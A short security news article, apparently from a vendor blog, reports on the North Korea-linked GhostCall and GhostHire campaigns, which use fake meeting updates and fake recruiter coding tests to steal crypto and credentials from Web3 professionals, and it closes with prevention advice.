GhostCall and GhostHire Overview
Threat actors linked to North Korea are running two related malware campaigns named GhostCall and GhostHire. These operations mainly target professionals in the Web3 and blockchain sectors. According to recent research, both campaigns are part of a long-running effort called SnatchCrypto. Since at least 2017, this effort has focused on stealing crypto assets and sensitive project data from companies worldwide.
How the Lures Work
GhostCall spreads through social messaging platforms where attackers approach tech executives and investors. They invite them to join fake video calls using phishing websites designed to mimic meeting platforms. The call seems real at first, but soon prompts the victim to “update” their software with a malicious script. Once downloaded, the script installs ZIP files that trigger a full infection chain. This trick has been used across different countries and targets mainly macOS users.
GhostHire’s Social Engineering
GhostHire uses a different lure. Attackers pose as recruiters contacting Web3 developers through messaging apps. They share links to fake coding assessments hosted on legitimate-looking repositories. Victims are told to finish the task within 30 minutes, which pressures them into running the code. However, the downloaded project contains hidden malware that installs additional payloads once executed. The malicious code adapts to the victim’s operating system, making detection harder.
Malware Families and Payloads
Researchers discovered that the infection often begins with a malicious AppleScript called DownTroy. This script installs fake meeting apps that seem genuine but hide multiple malware families. For example, loaders such as CosmicDoor, RooTroy, and RealTimeTroy are used to gather system data, install more malware, and even wipe files. Other payloads are written in Go, Rust, and Nim, allowing cross-platform attacks. Moreover, these components can steal credentials, files, and development secrets from infected machines.
Data Theft and Evolving Strategy
The campaigns steal browser passwords, cloud tokens, and service credentials from platforms like Git, Docker, and cloud environments. Therefore, stolen keys may expose entire blockchain projects and company systems. The attackers’ approach has evolved rapidly, often switching from fake Zoom pages to Teams invitations. Researchers also noted that generative AI tools now help speed up their malware development, making new variants appear faster.
How to Prevent Infection
To stay protected, users should avoid downloading software updates from unverified links or compressed files. Always confirm meeting invites or recruiter profiles through official company channels. In addition, organizations should deploy advanced endpoint monitoring and continuous threat detection tools. For example, managed detection and response systems can quickly identify malicious scripts or fake app installers. Regular phishing awareness training and strict code review policies also reduce risk and help block such advanced threats early.
Sleep well, we got you covered.
